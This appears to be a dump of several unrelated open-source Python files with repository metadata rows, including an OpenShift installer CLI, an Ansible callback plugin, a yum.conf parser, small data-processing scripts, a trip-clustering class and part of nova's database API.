if len(missing_facts) > 0:
missing_info = True
click.echo('For unattended installs, facts must be provided for all masters/nodes:')
for host in missing_facts:
click.echo('Host "%s" missing facts: %s' % (host, ", ".join(missing_facts[host])))
if missing_info:
sys.exit(1)
def get_missing_info_from_user(oo_cfg):
""" Prompts the user for any information missing from the given configuration. """
click.clear()
message = """
Welcome to the OpenShift Enterprise 3 installation.
Please confirm that following prerequisites have been met:
* All systems where OpenShift will be installed are running Red Hat Enterprise
Linux 7.
* All systems are properly subscribed to the required OpenShift Enterprise 3
repositories.
* All systems have run docker-storage-setup (part of the Red Hat docker RPM).
* All systems have working DNS that resolves not only from the perspective of
the installer but also from within the cluster.
When the process completes you will have a default configuration for Masters
and Nodes. For ongoing environment maintenance it's recommended that the
official Ansible playbooks be used.
For more information on installation prerequisites please see:
https://docs.openshift.com/enterprise/latest/admin_guide/install/prerequisites.html
"""
confirm_continue(message)
click.clear()
if oo_cfg.settings.get('ansible_ssh_user', '') == '':
oo_cfg.settings['ansible_ssh_user'] = get_ansible_ssh_user()
click.clear()
if oo_cfg.settings.get('variant', '') == '':
variant, version = get_variant_and_version()
oo_cfg.settings['variant'] = variant.name
oo_cfg.settings['variant_version'] = version.name
click.clear()
if not oo_cfg.hosts:
oo_cfg.hosts = collect_hosts(oo_cfg)
click.clear()
return oo_cfg
def collect_new_nodes(oo_cfg):
click.clear()
click.echo('*** New Node Configuration ***')
message = """
Add new nodes here
"""
click.echo(message)
return collect_hosts(oo_cfg, existing_env=True, masters_set=True, print_summary=False)
def get_installed_hosts(hosts, callback_facts):
installed_hosts = []
for host in hosts:
if(host.connect_to in callback_facts.keys()
and 'common' in callback_facts[host.connect_to].keys()
and callback_facts[host.connect_to]['common'].get('version', '')
and callback_facts[host.connect_to]['common'].get('version', '') != 'None'):
installed_hosts.append(host)
return installed_hosts
# pylint: disable=too-many-branches
# This pylint error will be corrected shortly in separate PR.
def get_hosts_to_run_on(oo_cfg, callback_facts, unattended, force, verbose):
# Copy the list of existing hosts so we can remove any already installed nodes.
hosts_to_run_on = list(oo_cfg.hosts)
# Check if master or nodes already have something installed
installed_hosts = get_installed_hosts(oo_cfg.hosts, callback_facts)
if len(installed_hosts) > 0:
click.echo('Installed environment detected.')
# This check has to happen before we start removing hosts later in this method
if not force:
if not unattended:
click.echo('By default the installer only adds new nodes ' \
'to an installed environment.')
response = click.prompt('Do you want to (1) only add additional nodes or ' \
'(2) reinstall the existing hosts ' \
'potentially erasing any custom changes?',
type=int)
# TODO: this should be reworked with error handling.
# Click can certainly do this for us.
# This should be refactored as soon as we add a 3rd option.
if response == 1:
force = False
if response == 2:
force = True
# present a message listing already installed hosts and remove hosts if needed
for host in installed_hosts:
if host.master:
click.echo("{} is already an OpenShift Master".format(host))
# Masters stay in the list, we need to run against them when adding
# new nodes.
elif host.node:
click.echo("{} is already an OpenShift Node".format(host))
# force is only used for reinstalls so we don't want to remove
# anything.
if not force:
hosts_to_run_on.remove(host)
# Handle the cases where we know about uninstalled systems
new_hosts = set(hosts_to_run_on) - set(installed_hosts)
if len(new_hosts) > 0:
for new_host in new_hosts:
click.echo("{} is currently uninstalled".format(new_host))
# Fall through
click.echo('Adding additional nodes...')
else:
if unattended:
if not force:
click.echo('Installed environment detected and no additional ' \
'nodes specified: aborting. If you want a fresh install, use ' \
'`atomic-openshift-installer install --force`')
sys.exit(1)
else:
if not force:
new_nodes = collect_new_nodes(oo_cfg)
hosts_to_run_on.extend(new_nodes)
oo_cfg.hosts.extend(new_nodes)
openshift_ansible.set_config(oo_cfg)
click.echo('Gathering information from hosts...')
callback_facts, error = openshift_ansible.default_facts(oo_cfg.hosts, verbose)
if error:
click.echo("There was a problem fetching the required information. See " \
"{} for details.".format(oo_cfg.settings['ansible_log_path']))
sys.exit(1)
else:
pass # proceeding as normal should do a clean install
return hosts_to_run_on, callback_facts
@click.group()
@click.pass_context
@click.option('--unattended', '-u', is_flag=True, default=False)
@click.option('--configuration', '-c',
type=click.Path(file_okay=True,
dir_okay=False,
writable=True,
readable=True),
default=None)
@click.option('--ansible-playbook-directory',
'-a',
type=click.Path(exists=True,
file_okay=False,
dir_okay=True,
readable=True),
# callback=validate_ansible_dir,
default=DEFAULT_PLAYBOOK_DIR,
envvar='OO_ANSIBLE_PLAYBOOK_DIRECTORY')
@click.option('--ansible-config',
type=click.Path(file_okay=True,
dir_okay=False,
writable=True,
readable=True),
default=None)
@click.option('--ansible-log-path',
type=click.Path(file_okay=True,
dir_okay=False,
writable=True,
readable=True),
default="/tmp/ansible.log")
@click.option('-v', '--verbose',
is_flag=True, default=False)
#pylint: disable=too-many-arguments
#pylint: disable=line-too-long
# Main CLI entrypoint, not much we can do about too many arguments.
def cli(ctx, unattended, configuration, ansible_playbook_directory, ansible_config, ansible_log_path, verbose):
"""
atomic-openshift-installer makes the process for installing OSE or AEP
easier by interactively gathering the data needed to run on each host.
It can also be run in unattended mode if provided with a configuration file.
Further reading: https://docs.openshift.com/enterprise/latest/install_config/install/quick_install.html
"""
ctx.obj = {}
ctx.obj['unattended'] = unattended
ctx.obj['configuration'] = configuration
ctx.obj['ansible_config'] = ansible_config
ctx.obj['ansible_log_path'] = ansible_log_path
ctx.obj['verbose'] = verbose
try:
oo_cfg = OOConfig(ctx.obj['configuration'])
except OOConfigInvalidHostError as e:
click.echo(e)
sys.exit(1)
# If no playbook dir on the CLI, check the config:
if not ansible_playbook_directory:
ansible_playbook_directory = oo_cfg.settings.get('ansible_playbook_directory', '')
# If still no playbook dir, check for the default location:
if not ansible_playbook_directory and os.path.exists(DEFAULT_PLAYBOOK_DIR):
ansible_playbook_directory = DEFAULT_PLAYBOOK_DIR
validate_ansible_dir(ansible_playbook_directory)
oo_cfg.settings['ansible_playbook_directory'] = ansible_playbook_directory
oo_cfg.ansible_playbook_directory = ansible_playbook_directory
ctx.obj['ansible_playbook_directory'] = ansible_playbook_directory
if ctx.obj['ansible_config']:
oo_cfg.settings['ansible_config'] = ctx.obj['ansible_config']
elif 'ansible_config' not in oo_cfg.settings and \
os.path.exists(DEFAULT_ANSIBLE_CONFIG):
# If we're installed by RPM this file should exist and we can use it as our default:
oo_cfg.settings['ansible_config'] = DEFAULT_ANSIBLE_CONFIG
oo_cfg.settings['ansible_log_path'] = ctx.obj['ansible_log_path']
ctx.obj['oo_cfg'] = oo_cfg
openshift_ansible.set_config(oo_cfg)
@click.command()
@click.pass_context
def uninstall(ctx):
oo_cfg = ctx.obj['oo_cfg']
verbose = ctx.obj['verbose']
if len(oo_cfg.hosts) == 0:
click.echo("No hosts defined in: %s" % oo_cfg.config_path)
sys.exit(1)
click.echo("OpenShift will be uninstalled from the following hosts:\n")
if not ctx.obj['unattended']:
# Prompt interactively to confirm:
for host in oo_cfg.hosts:
click.echo(" * %s" % host.connect_to)
proceed = click.confirm("\nDo you wish to proceed?")
if not proceed:
click.echo("Uninstall cancelled.")
sys.exit(0)
openshift_ansible.run_uninstall_playbook(verbose)
@click.command()
@click.pass_context
def upgrade(ctx):
oo_cfg = ctx.obj['oo_cfg']
verbose = ctx.obj['verbose']
if len(oo_cfg.hosts) == 0:
click.echo("No hosts defined in: %s" % oo_cfg.config_path)
sys.exit(1)
# Update config to reflect the version we're targetting, we'll write
# to disk once ansible completes successfully, not before.
old_variant = oo_cfg.settings['variant']
old_version = oo_cfg.settings['variant_version']
if oo_cfg.settings['variant'] == 'enterprise':
oo_cfg.settings['variant'] = 'openshift-enterprise'
version = find_variant(oo_cfg.settings['variant'])[1]
oo_cfg.settings['variant_version'] = version.name
click.echo("Openshift will be upgraded from %s %s to %s %s on the following hosts:\n" % (
old_variant, old_version, oo_cfg.settings['variant'],
oo_cfg.settings['variant_version']))
for host in oo_cfg.hosts:
click.echo(" * %s" % host.connect_to)
if not ctx.obj['unattended']:
# Prompt interactively to confirm:
proceed = click.confirm("\nDo you wish to proceed?")
if not proceed:
click.echo("Upgrade cancelled.")
sys.exit(0)
retcode = openshift_ansible.run_upgrade_playbook(verbose)
if retcode > 0:
click.echo("Errors encountered during upgrade, please check %s." %
oo_cfg.settings['ansible_log_path'])
else:
oo_cfg.save_to_disk()
click.echo("Upgrade completed! Rebooting all hosts is recommended.")
@click.command()
@click.option('--force', '-f', is_flag=True, default=False)
@click.pass_context
def install(ctx, force):
oo_cfg = ctx.obj['oo_cfg']
verbose = ctx.obj['verbose']
if ctx.obj['unattended']:
error_if_missing_info(oo_cfg)
else:
oo_cfg = get_missing_info_from_user(oo_cfg)
check_hosts_config(oo_cfg, ctx.obj['unattended'])
print_installation_summary(oo_cfg.hosts, oo_cfg.settings.get('variant_version', None))
click.echo('Gathering information from hosts...')
callback_facts, error = openshift_ansible.default_facts(oo_cfg.hosts,
verbose)
if error:
click.echo("There was a problem fetching the required information. " \
"Please see {} for details.".format(oo_cfg.settings['ansible_log_path']))
sys.exit(1)
hosts_to_run_on, callback_facts = get_hosts_to_run_on(
oo_cfg, callback_facts, ctx.obj['unattended'], force, verbose)
click.echo('Writing config to: %s' % oo_cfg.config_path)
# We already verified this is not the case for unattended installs, so this can
# only trigger for live CLI users:
# TODO: if there are *new* nodes and this is a live install, we may need the user
# to confirm the settings for new nodes. Look into this once we're distinguishing
# between new and pre-existing nodes.
if len(oo_cfg.calc_missing_facts()) > 0:
confirm_hosts_facts(oo_cfg, callback_facts)
oo_cfg.save_to_disk()
click.echo('Ready to run installation process.')
message = """
If changes are needed please edit the config file above and re-run.
"""
if not ctx.obj['unattended']:
confirm_continue(message)
error = openshift_ansible.run_main_playbook(oo_cfg.hosts,
hosts_to_run_on, verbose)
if error:
# The bootstrap script will print out the log location.
message = """
An error was detected. After resolving the problem please relaunch the
installation process.
"""
click.echo(message)
sys.exit(1)
else:
message = """
The installation was successful!
If this is your first time installing please take a look at the Administrator
Guide for advanced options related to routing, storage, authentication and much
more:
http://docs.openshift.com/enterprise/latest/admin_guide/overview.html
"""
click.echo(message)
click.pause()
cli.add_command(install)
cli.add_command(upgrade)
cli.add_command(uninstall)
if __name__ == '__main__':
# This is expected behaviour for context passing with click library:
# pylint: disable=unexpected-keyword-arg
cli(obj={})
|
apache-2.0
| -6,367,065,744,073,844,000
| 37.594859
| 120
| 0.636845
| false
| 3.992403
| true
| false
| false
|
lemiere/python-lecture
|
tp_stat/exemples/boucle_for.py
|
1
|
1274
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Lemiere Yves
# Juillet 2017
def main():
debug = True
if debug:
print("*************************")
print("* Welcome in boucle_for *")
print("*************************\n")
# Ceci est une liste de chaines de caractères:
my_list_of_heroes = ['Spider-Man','Daredevil','Iron Man','Flash','Wonder Woman']
print(my_list_of_heroes)
# La variable 'hero' prendra tour à tour chaque valeur de la liste my_list_of_heroes:
iterator = 0
for hero in my_list_of_heroes:
print (iterator)
print ("my current hero is {}".format(hero))
iterator = iterator + 1
print("Finished with {} heroes ".format(iterator))
print("Finished with {} heroes ".format(len(my_list_of_heroes)))
# Cette boucle ne commence qu'à partir du second élément de la liste:
iterator = 0
for hero in my_list_of_heroes[2:]:
print (iterator)
print ("my current hero is {}".format(hero))
iterator = iterator + 1
print("Finished with {} heroes ".format(iterator))
print("Finished with {} heroes ".format(len(my_list_of_heroes)))
return
main()
|
gpl-3.0
| 3,050,231,175,831,166,500
| 26.586957
| 93
| 0.547675
| false
| 3.476712
| false
| false
| false
|
wcmitchell/insights-core
|
insights/parsers/yum_conf.py
|
1
|
2326
|
"""
YumConf - file ``/etc/yum.conf``
================================
This module provides parsing for the ``/etc/yum.conf`` file.
The ``YumConf`` class parses the information in the file
``/etc/yum.conf``. See the ``IniConfigFile`` class for more
information on attributes and methods.
Sample input data looks like::
[main]
cachedir=/var/cache/yum/$basearch/$releasever
keepcache=0
debuglevel=2
logfile=/var/log/yum.log
exactarch=1
obsoletes=1
gpgcheck=1
plugins=1
installonly_limit=3
[rhel-7-server-rpms]
metadata_expire = 86400
baseurl = https://cdn.redhat.com/content/rhel/server/7/$basearch
name = Red Hat Enterprise Linux 7 Server (RPMs)
gpgkey = file:///etc/pki/rpm-gpg/RPM-GPG-KEY-redhat-release
enabled = 1
gpgcheck = 1
Examples:
>>> yconf = shared[YumConf]
>>> yconf.defaults()
{'admin_token': 'ADMIN', 'compute_port': '8774'}
>>> 'main' in yconf
True
>>> 'rhel-7-server-rpms' in yconf
True
>>> yconf.has_option('main', 'gpgcheck')
True
>>> yconf.has_option('main', 'foo')
False
>>> yconf.get('rhel-7-server-rpms', 'enabled')
'1'
>>> yconf.items('main')
{'plugins': '1',
'keepcache': '0',
'cachedir': '/var/cache/yum/$basearch/$releasever',
'exactarch': '1',
'obsoletes': '1',
'installonly_limit': '3',
'debuglevel': '2',
'gpgcheck': '1',
'logfile': '/var/log/yum.log'}
"""
from insights.contrib.ConfigParser import NoOptionError
from .. import parser, IniConfigFile
from insights.specs import yum_conf
@parser(yum_conf)
class YumConf(IniConfigFile):
"""Parse contents of file ``/etc/yum.conf``."""
def parse_content(self, content):
super(YumConf, self).parse_content(content)
# File /etc/yum.conf may contain repos definitions.
# Keywords 'gpgkey' and 'baseurl' might contain multiple
# values separated by comma. Convert those values into a list.
for section in self.sections():
for key in ('gpgkey', 'baseurl'):
try:
value = self.get(section, key)
if value and isinstance(value, str):
self.data.set(section, key, value.split(','))
except NoOptionError:
pass
|
apache-2.0
| -8,295,788,500,542,155,000
| 28.075
| 70
| 0.596733
| false
| 3.497744
| false
| false
| false
|
pressbooks/trellis
|
lib/trellis/plugins/callback/vars.py
|
1
|
4548
|
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
import sys
from __main__ import cli
from ansible.module_utils.six import iteritems
from ansible.errors import AnsibleError
from ansible.parsing.yaml.objects import AnsibleMapping, AnsibleSequence, AnsibleUnicode
from ansible.playbook.play_context import PlayContext
from ansible.playbook.task import Task
from ansible.plugins.callback import CallbackBase
from ansible.template import Templar
from ansible.utils.unsafe_proxy import wrap_var
class CallbackModule(CallbackBase):
''' Creates and modifies play and host variables '''
CALLBACK_VERSION = 2.0
CALLBACK_NAME = 'vars'
def __init__(self):
super(CallbackModule, self).__init__()
# handle Ansible 2.7 and 2.8 cases by normalizing each into a dict
try:
from ansible import context
self._options = context.CLIARGS
except ImportError:
self._options = vars(cli.options) if cli else {}
def raw_triage(self, key_string, item, patterns):
# process dict values
if isinstance(item, AnsibleMapping):
return AnsibleMapping(dict((key,self.raw_triage('.'.join([key_string, key]), value, patterns)) for key,value in iteritems(item)))
# process list values
elif isinstance(item, AnsibleSequence):
return AnsibleSequence([self.raw_triage('.'.join([key_string, str(i)]), value, patterns) for i,value in enumerate(item)])
# wrap values if they match raw_vars pattern
elif isinstance(item, AnsibleUnicode):
match = next((pattern for pattern in patterns if re.match(pattern, key_string)), None)
return wrap_var(item) if match else item
else:
return item
def raw_vars(self, play, host, hostvars):
if 'raw_vars' not in hostvars:
return
raw_vars = Templar(variables=hostvars, loader=play._loader).template(hostvars['raw_vars'])
if not isinstance(raw_vars, list):
raise AnsibleError('The `raw_vars` variable must be defined as a list.')
patterns = [re.sub(r'\*', '(.)*', re.sub(r'\.', '\.', var)) for var in raw_vars if var.split('.')[0] in hostvars]
keys = set(pattern.split('\.')[0] for pattern in patterns)
for key in keys:
if key in play.vars:
play.vars[key] = self.raw_triage(key, play.vars[key], patterns)
elif key in hostvars:
host.vars[key] = self.raw_triage(key, hostvars[key], patterns)
def cli_options(self):
options = []
strings = {
'--connection': 'connection',
'--private-key': 'private_key_file',
'--ssh-common-args': 'ssh_common_args',
'--ssh-extra-args': 'ssh_extra_args',
'--timeout': 'timeout',
'--vault-password-file': 'vault_password_file',
}
for option,value in iteritems(strings):
if self._options.get(value, False):
options.append("{0}='{1}'".format(option, str(self._options.get(value))))
for inventory in self._options.get('inventory'):
options.append("--inventory='{}'".format(str(inventory)))
if self._options.get('ask_vault_pass', False):
options.append('--ask-vault-pass')
return ' '.join(options)
def darwin_without_passlib(self):
if not sys.platform.startswith('darwin'):
return False
try:
import passlib.hash
return False
except:
return True
def v2_playbook_on_play_start(self, play):
env = play.get_variable_manager().get_vars(play=play).get('env', '')
env_group = next((group for key,group in iteritems(play.get_variable_manager()._inventory.groups) if key == env), False)
if env_group:
env_group.set_priority(20)
for host in play.get_variable_manager()._inventory.list_hosts(play.hosts[0]):
hostvars = play.get_variable_manager().get_vars(play=play, host=host)
self.raw_vars(play, host, hostvars)
host.vars['ssh_args_default'] = PlayContext(play=play)._ssh_args.default
host.vars['cli_options'] = self.cli_options()
host.vars['cli_ask_pass'] = self._options.get('ask_pass', False)
host.vars['cli_ask_become_pass'] = self._options.get('become_ask_pass', False)
host.vars['darwin_without_passlib'] = self.darwin_without_passlib()
|
mit
| 7,478,106,766,313,598,000
| 38.894737
| 141
| 0.616755
| false
| 4.014122
| false
| false
| false
|
HarrieO/PairwisePreferenceMultileave
|
utils/argparsers/multileaveargparser.py
|
1
|
1774
|
# -*- coding: utf-8 -*-
import sys
import os
import argparse
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
from utils.argparsers.simulationargparser import SimulationArgumentParser
class MultileaveArgumentParser(SimulationArgumentParser):
def __init__(self, description=None, set_arguments={}):
set_arguments['print_feature_count'] = False
super(MultileaveArgumentParser, self).__init__(description=description,
set_arguments=set_arguments)
# self.set_argument_namespace('MultileaveArgumentParser')
# self.add_argument('--bias', dest='bias_experiment', action='store_true', required=False,
# default=False, help='Flag for bias experiment.')
# self.add_argument('--k --n_results', dest='k', default=10, type=int,
# help='Number of results shown after each query.')
self.add_argument('--n_rankers', dest='n_rankers', required=True, type=int,
help='Number of rankers to use in simulation.')
# def get_multileave_args(self, args):
# return self.get_args(args, 'MultileaveArgumentParser')
# def parse_args_rec(self):
# output_str, args, sim_args = super(MultileaveArgumentParser, self).parse_args_rec()
# multileave_args = self.get_multileave_args(args)
# if not sim_args.no_run_details:
# output_str += '\nMultileave Arguments'
# output_str += '\n---------------------'
# for name, value in vars(multileave_args).items():
# output_str += '\n%s %s' % (name, value)
# output_str += '\n---------------------'
# return output_str, args, sim_args, multileave_args
|
mit
| 1,622,209,415,317,331,000
| 44.487179
| 98
| 0.590192
| false
| 3.977578
| false
| false
| false
|
alexhunsley/nsconf-video-file-renamer
|
nsConfVidsRenamer.py
|
1
|
1816
|
# NSConf videos renamer
# Alex Hunsley 2013
#
# This quick hack fixes the WTF that is the file naming of the NSConf videos.
# Note that the files are renamed by making copies, rather than
# renamed in place, to avoid annoying irreversible screwups.
#
import csv
import os.path
import sys
import string
import shutil
# source vid files
vidsFolder = "allVidsUnzipped"
# destination vid files (look here for the renamed goodness)
renamedVidsFolder = "allVidsRenamed"
if os.path.exists(renamedVidsFolder):
shutil.rmtree(renamedVidsFolder)
os.makedirs(renamedVidsFolder)
# This file should have been provided alongside this script.
# It's metadata created from the NSConf vids download page. Which is itself
# inconsistent in the format of data it provides, and some stuff near the end
# is in the wrong order. What do I look like to you, the unix sort command?
csvfile = open('NSConfVidsSummary1.csv', 'rb')
validFilenameChars = "-_.() %s%s" % (string.ascii_letters, string.digits)
reader = csv.reader(csvfile, delimiter=',', quotechar='"')
firstRow = True
for row in reader:
if (firstRow):
firstRow = False
continue
vidFilename = row[8]
description = row[0]
vidIndex = vidFilename[:2]
authors = row[1]
baseName = row[9]
if (len(authors) == 0):
authors = "Misc"
fullFilename = "%s - %02d %s (%s).%s" % (baseName, int(vidIndex), description, authors, "m4v")
fullFilename = ''.join(c for c in fullFilename if c in validFilenameChars)
fullDestinationFilename = "%s/%s" % (renamedVidsFolder, fullFilename)
fullSourceFilename = "%s/%s.m4v" % (vidsFolder, vidFilename)
print "%s --> %s" % (fullSourceFilename, fullDestinationFilename)
try:
shutil.copyfile(fullSourceFilename, fullDestinationFilename)
except IOError:
print "****** Warning: file not found: %s" % fullSourceFilename
|
mit
| -1,552,988,196,664,735,200
| 27.375
| 95
| 0.73348
| false
| 3.277978
| false
| false
| false
|
WorldViews/Spirals
|
scripts/filterLayer.py
|
1
|
1154
|
import json
#from LandOrSea import overLand
from LandOrSeaBaseline import overLand
def filterByLand(path, opath):
obj = json.load(file(path))
recs = obj['records']
landRecs = []
n = 0
nLand = 0
for rec in recs:
n += 1
lat = rec['lat']
lon = rec['lon']
if overLand(lat,lon):
nLand += 1
landRecs.append(rec)
print nLand, n
obj['records'] = landRecs
json.dump(obj, file(opath, "w"), indent=4)
print "Num Recs: %d over land: %d\n" % (n, nLand)
#filterByLand("../Viewer/data/dancing_data.json", "../Viewer/data/dance_data.json")
#filterByLand("../Viewer/data/temples0_data.json", "../Viewer/data/temples_data.json")
#filterByLand("../Viewer/data/climbing0_data.json", "../Viewer/data/climbing_data.json")
#filterByLand("../Viewer/data/temples0_data.json", "../Viewer/data/temples_data.json")
#filterByLand("../Viewer/data/hiking0_data.json", "../Viewer/data/hiking_data.json")
filterByLand("../Viewer/data/gardens0_data.json", "../Viewer/data/gardens_data.json")
filterByLand("../Viewer/data/surfing0_data.json", "../Viewer/data/surfing_data.json")
|
mit
| 942,163,728,044,186,400
| 31.971429
| 88
| 0.641248
| false
| 2.780723
| false
| false
| false
|
joshzarrabi/e-mission-server
|
emission/analysis/modelling/tour_model/representatives.py
|
1
|
8413
|
# standard imports
import numpy
import math
import copy
# our imports
from emission.core.wrapper.trip_old import Trip, Coordinate
import emission.storage.decorations.trip_queries as esdtq
import emission.storage.decorations.place_queries as esdpq
"""
This class creates a group of representatives for each cluster
and defines the locations that the user visits from those clusters.
The purpose of this class is to get the list of clusters with
start and end points to create the tour graph.
To use this class, as input it takes
- data: A list of trip objects
- labels: A list of integers that define the clusters on the data.
The labels are calculated in cluster pipeline from the clusters. The labels
should be a list of integers of the same length as the list of data, where
different numbers indicate different clusters.
"""
class representatives:
def __init__(self, data, labels, old=True):
self.data = data
self.is_old = old
if not self.data:
self.data = []
self.labels = labels
if not self.labels:
self.labels = []
if len(self.data) != len(self.labels):
raise ValueError('Length of data must equal length of clustering labels.')
self.num_clusters = len(set(self.labels))
self.size = len(self.data)
#get the list of clusters based on the labels
def list_clusters(self):
if not self.data:
self.clusters = []
return
self.clusters = [0] * self.num_clusters
for i in range(self.num_clusters):
self.clusters[i] = []
for i in range(len(self.labels)):
a = self.labels[i]
self.clusters[a].append(self.data[i])
#get the representatives for each cluster
def get_reps(self):
self.reps = []
if not self.data:
return
for cluster in self.clusters:
points = [[], [], [], []]
for c in cluster:
if self.is_old:
points[0].append(c.trip_start_location.lat)
points[1].append(c.trip_start_location.lon)
points[2].append(c.trip_end_location.lat)
points[3].append(c.trip_end_location.lon)
else:
# We want (lat, lon) to be consistent with old above.
# But in the new, our data is in geojson so it is (lon, lat).
# Fix it by flipping the order of the indices
points[0].append(c.start_loc["coordinates"][1])
points[1].append(c.start_loc["coordinates"][0])
points[2].append(c.end_loc["coordinates"][1])
points[3].append(c.end_loc["coordinates"][0])
centers = numpy.mean(points, axis=1)
a = Trip(None, None, None, None, None, None, Coordinate(centers[0], centers[1]), Coordinate(centers[2], centers[3]))
self.reps.append(a)
#map the representatives
def map(self):
import pygmaps
mymap = pygmaps.maps(37.5, -122.32, 10)
for t in self.reps:
start_lat = t.trip_start_location.lat
start_lon = t.trip_start_location.lon
end_lat = t.trip_end_location.lat
end_lon = t.trip_end_location.lon
path = [(start_lat, start_lon), (end_lat, end_lon)]
mymap.addpath(path)
for l in self.locs:
mymap.addpoint(l.lat, l.lon, '#0000FF')
mymap.draw('./myreps.html')
#define the set of locations for the data
def locations(self):
self.bins = []
self.locs = []
if not self.data:
self.num_locations = 0
return
for a in range(self.num_clusters):
added_start = False
added_end = False
for bin in self.bins:
if self.match('start', a, bin) and not added_start:
bin.append(('start', a))
added_start = True
if self.match('end', a, bin) and not added_end:
bin.append(('end', a))
added_end = True
if not added_start:
newbin = [('start', a)]
if self.match('end', a, newbin) and not added_end:
newbin.append(('end', a))
added_end = True
self.bins.append(newbin)
if not added_end:
self.bins.append([('end', a)])
self.num_locations = len(self.bins)
self.locs = []
for bin in self.bins:
locs = []
for b in bin:
if b[0] == 'start':
point = self.reps[b[1]].trip_start_location
if b[0] == 'end':
point = self.reps[b[1]].trip_end_location
locs.append([point.lat, point.lon])
locs = numpy.mean(locs, axis=0)
coord = Coordinate(locs[0], locs[1])
self.locs.append(coord)
#create the input to the tour graph
def cluster_dict(self):
self.tour_dict = [0] * self.num_clusters
if not self.data:
self.tour_dict = []
self.self_loops_tour_dict = []
return
for i in range(self.num_clusters):
a = {'sections' : self.clusters[i]}
self.tour_dict[i] = a
for i in range(self.num_clusters):
start_places = []
end_places = []
for t in self.tour_dict[i]["sections"]:
start = esdpq.get_place(t.start_place)
end = esdpq.get_place(t.end_place)
start_places.append(start)
end_places.append(end)
self.tour_dict[i]["start_places"] = start_places
self.tour_dict[i]["end_places"] = end_places
for i in range(self.num_locations):
bin = self.bins[i]
for b in bin:
cluster = b[1]
label = b[0]
self.tour_dict[cluster][label] = i
for i in range(self.num_clusters):
cluster = self.tour_dict[i]
start_coords = self.locs[cluster['start']]
end_coords = self.locs[cluster['end']]
self.tour_dict[i]['start_coords'] = start_coords
self.tour_dict[i]['end_coords'] = end_coords
self.self_loops_tour_dict = copy.deepcopy(self.tour_dict)
for i in range(len(self.tour_dict)-1, -1, -1):
cluster = self.tour_dict[i]
if cluster['start'] == cluster['end'] and len(self.tour_dict) > 1:
self.tour_dict.remove(cluster)
newlocs = []
for cluster in self.tour_dict:
if cluster['start'] not in newlocs:
newlocs.append(cluster['start'])
if cluster['end'] not in newlocs:
newlocs.append(cluster['end'])
for i in range(len(self.tour_dict)):
self.tour_dict[i]['start'] = newlocs.index(self.tour_dict[i]['start'])
self.tour_dict[i]['end'] = newlocs.index(self.tour_dict[i]['end'])
#check whether a point is close to all points in a bin
def match(self, label, a, bin):
if label == 'start':
pointa = self.reps[a].trip_start_location
elif label == 'end':
pointa = self.reps[a].trip_end_location
for b in bin:
if b[0] == 'start':
pointb = self.reps[b[1]].trip_start_location
elif b[0] == 'end':
pointb = self.reps[b[1]].trip_end_location
if self.distance(pointa.lat, pointa.lon, pointb.lat, pointb.lon) > 300:
return False
return True
#the meter distance between two points
def distance(self, lat1, lon1, lat2, lon2):
R = 6371000
rlat1 = math.radians(lat1)
rlat2 = math.radians(lat2)
lon = math.radians(lon2 - lon1);
lat = math.radians(lat2-lat1);
a = math.sin(lat/2.0)**2 + math.cos(rlat1)*math.cos(rlat2) * math.sin(lon/2.0)**2
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))
d = R * c
return d
|
bsd-3-clause
| -1,976,690,382,363,518,000
| 37.313084
| 128
| 0.523476
| false
| 3.822353
| false
| false
| false
|
shhui/nova
|
nova/db/sqlalchemy/api.py
|
1
|
220845
|
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Implementation of SQLAlchemy backend."""
import collections
import copy
import datetime
import functools
import sys
import time
import uuid
from oslo.config import cfg
import six
from sqlalchemy import and_
from sqlalchemy import Boolean
from sqlalchemy.exc import DataError
from sqlalchemy.exc import IntegrityError
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import or_
from sqlalchemy.orm import contains_eager
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import joinedload_all
from sqlalchemy.orm import noload
from sqlalchemy.schema import Table
from sqlalchemy.sql.expression import asc
from sqlalchemy.sql.expression import desc
from sqlalchemy.sql.expression import select
from sqlalchemy.sql import func
from sqlalchemy import String
from nova import block_device
from nova.compute import task_states
from nova.compute import vm_states
import nova.context
from nova.db.sqlalchemy import models
from nova import exception
from nova.openstack.common.db import exception as db_exc
from nova.openstack.common.db.sqlalchemy import session as db_session
from nova.openstack.common.db.sqlalchemy import utils as sqlalchemyutils
from nova.openstack.common import excutils
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
from nova.openstack.common import uuidutils
from nova import quota
db_opts = [
cfg.StrOpt('osapi_compute_unique_server_name_scope',
default='',
help='When set, compute API will consider duplicate hostnames '
'invalid within the specified scope, regardless of case. '
'Should be empty, "project" or "global".'),
]
connection_opts = [
cfg.StrOpt('slave_connection',
secret=True,
help='The SQLAlchemy connection string used to connect to the '
'slave database'),
]
CONF = cfg.CONF
CONF.register_opts(db_opts)
CONF.register_opts(connection_opts, group='database')
CONF.import_opt('compute_topic', 'nova.compute.rpcapi')
CONF.import_opt('connection',
'nova.openstack.common.db.options',
group='database')
LOG = logging.getLogger(__name__)
_MASTER_FACADE = None
_SLAVE_FACADE = None
def _create_facade_lazily(use_slave=False):
global _MASTER_FACADE
global _SLAVE_FACADE
return_slave = use_slave and CONF.database.slave_connection
if not return_slave:
if _MASTER_FACADE is None:
_MASTER_FACADE = db_session.EngineFacade(
CONF.database.connection,
**dict(CONF.database.iteritems())
)
return _MASTER_FACADE
else:
if _SLAVE_FACADE is None:
_SLAVE_FACADE = db_session.EngineFacade(
CONF.database.slave_connection,
**dict(CONF.database.iteritems())
)
return _SLAVE_FACADE
def get_engine(use_slave=False):
facade = _create_facade_lazily(use_slave)
return facade.get_engine()
def get_session(use_slave=False, **kwargs):
facade = _create_facade_lazily(use_slave)
return facade.get_session(**kwargs)
